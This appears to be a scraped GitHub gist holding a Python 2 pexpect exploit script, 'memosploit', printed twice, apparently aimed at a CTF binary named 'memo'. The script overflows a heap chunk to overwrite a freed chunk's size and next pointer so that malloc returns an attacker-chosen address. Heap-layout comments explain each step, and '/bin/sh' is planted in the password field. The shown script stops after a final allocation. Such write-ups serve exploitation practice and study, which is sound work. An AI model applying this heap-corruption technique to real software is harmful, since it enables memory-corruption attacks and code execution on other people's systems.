P1kachu/memosploit.ipynb

## memosploit.ipynb

      
Display the source blob

    
Display the rendered blob

    
    Raw
  

              memosploit.ipynb
            
          
      Sorry, something went wrong. Reload?
      Sorry, we cannot display this file.
      Sorry, this file is invalid so it cannot be displayed.
      
          Viewer requires iframe.
      
    
## memosploit.py
#!/usr/bin/env python2
# Without gdb

import pexpect
import struct
import sys

p = pexpect.spawn('./memo')
p.logfile = sys.stdout
p.setecho(False)

#                                                                    malloc pointer
#                                                                        |
# slots:                                                                 v
# malloc(1) = 0x603010          |     0x0 (8bytes)    |  0x31 (8 bytes)  |  0xDATA (32 bytes)
# malloc(2) = 0x603040          |     0x0 (8bytes)    |  0x31 (8 bytes)  |  0xDATA (32 bytes)
# free(2)                       |     0x0 (8bytes)    |  0x31 (8 bytes)  |  0xPREV (8 bytes) | 0xNEXT (8 bytes)
# free(1)                       |     0x0 (8bytes)    |  0x31 (8 bytes)  |  0xPREV (8 bytes) | 0xNEXT (8 bytes)
# malloc(1) = 0x603010          |     0x0 (8bytes)    |  0x31 (8 bytes)  |  0x424242...
# malloc(2) = 0x603040          |     ...0x4242... (8 bytes)    |  ...0x4242... (8 bytes)  |  0xDATA (32 bytes)
# malloc(0) = 0x424242....      |     0x0 (8bytes)    |  0x1000 (8 bytes) | 0xDATA (LOT OF BYTES)

p.expect("What's user name:")
p.sendline("P1kachu")

p.expect("Do you wanna set password\? \(y/n\)")
p.sendline("y")

p.expect("Password: ")
p.sendline("/bin/sh")
p.expect(">> ")

SIZE=31

# alloc(1)
p.sendline("1")
p.expect("Index: ")
p.sendline("1")
p.expect("Length: ")
p.sendline(str(SIZE))
p.expect("Message: ")
p.sendline(SIZE * 'A')
p.expect(">> ")


# alloc(2)
p.sendline('1')
p.expect("Index: ")
p.sendline("2")
p.expect("Length: ")
p.sendline(str(SIZE))
p.expect("Message: ")
p.sendline(SIZE * 'A')
p.expect(">> ")

# free(2)
p.sendline('4')
p.expect("Index: ")
p.sendline("2")
p.expect(">> ")

# free(1)
p.sendline('4')
p.expect("Index: ")
p.sendline("1")
p.expect(">> ")

TOOMUCH=96
NEWSIZE=struct.pack("<Q", 0x20)
NEWPTR=struct.pack("<Q", 0x603060)
ZERO=struct.pack("<Q", 0)

# alloc(1)
p.sendline("1")
p.expect("Index: ")
p.sendline("1")
p.expect("Length: ")
p.sendline(str(TOOMUCH))
p.expect("message too long, you can leave on memo though")
p.sendline(0x20 * 'D' + ZERO + NEWSIZE + NEWPTR)
p.expect(">> ")


# alloc(2)
p.sendline("1")
p.expect("Index: ")
p.sendline("2")
p.expect("Length: ")
p.sendline(str(SIZE))
p.expect("Message: ")
p.sendline(SIZE * 'A')
p.expect(">> ")

# alloc(0)
p.sendline('1')
p.expect("Index: ")
p.sendline("0")
p.expect("Length: ")
p.sendline(str(SIZE))
p.expect("Message: ")
p.sendline(SIZE * 'A')
p.expect(">> ")
	#!/usr/bin/env python2
	# Without gdb

	import pexpect
	import struct
	import sys

	p = pexpect.spawn('./memo')
	p.logfile = sys.stdout
	p.setecho(False)

	# malloc pointer
	# \|
	# slots: v
	# malloc(1) = 0x603010 \| 0x0 (8bytes) \| 0x31 (8 bytes) \| 0xDATA (32 bytes)
	# malloc(2) = 0x603040 \| 0x0 (8bytes) \| 0x31 (8 bytes) \| 0xDATA (32 bytes)
	# free(2) \| 0x0 (8bytes) \| 0x31 (8 bytes) \| 0xPREV (8 bytes) \| 0xNEXT (8 bytes)
	# free(1) \| 0x0 (8bytes) \| 0x31 (8 bytes) \| 0xPREV (8 bytes) \| 0xNEXT (8 bytes)
	# malloc(1) = 0x603010 \| 0x0 (8bytes) \| 0x31 (8 bytes) \| 0x424242...
	# malloc(2) = 0x603040 \| ...0x4242... (8 bytes) \| ...0x4242... (8 bytes) \| 0xDATA (32 bytes)
	# malloc(0) = 0x424242.... \| 0x0 (8bytes) \| 0x1000 (8 bytes) \| 0xDATA (LOT OF BYTES)

	p.expect("What's user name:")
	p.sendline("P1kachu")

	p.expect("Do you wanna set password\? \(y/n\)")
	p.sendline("y")

	p.expect("Password: ")
	p.sendline("/bin/sh")
	p.expect(">> ")

	SIZE=31

	# alloc(1)
	p.sendline("1")
	p.expect("Index: ")
	p.sendline("1")
	p.expect("Length: ")
	p.sendline(str(SIZE))
	p.expect("Message: ")
	p.sendline(SIZE * 'A')
	p.expect(">> ")


	# alloc(2)
	p.sendline('1')
	p.expect("Index: ")
	p.sendline("2")
	p.expect("Length: ")
	p.sendline(str(SIZE))
	p.expect("Message: ")
	p.sendline(SIZE * 'A')
	p.expect(">> ")

	# free(2)
	p.sendline('4')
	p.expect("Index: ")
	p.sendline("2")
	p.expect(">> ")

	# free(1)
	p.sendline('4')
	p.expect("Index: ")
	p.sendline("1")
	p.expect(">> ")

	TOOMUCH=96
	NEWSIZE=struct.pack("<Q", 0x20)
	NEWPTR=struct.pack("<Q", 0x603060)
	ZERO=struct.pack("<Q", 0)

	# alloc(1)
	p.sendline("1")
	p.expect("Index: ")
	p.sendline("1")
	p.expect("Length: ")
	p.sendline(str(TOOMUCH))
	p.expect("message too long, you can leave on memo though")
	p.sendline(0x20 * 'D' + ZERO + NEWSIZE + NEWPTR)
	p.expect(">> ")


	# alloc(2)
	p.sendline("1")
	p.expect("Index: ")
	p.sendline("2")
	p.expect("Length: ")
	p.sendline(str(SIZE))
	p.expect("Message: ")
	p.sendline(SIZE * 'A')
	p.expect(">> ")

	# alloc(0)
	p.sendline('1')
	p.expect("Index: ")
	p.sendline("0")
	p.expect("Length: ")
	p.sendline(str(SIZE))
	p.expect("Message: ")
	p.sendline(SIZE * 'A')
	p.expect(">> ")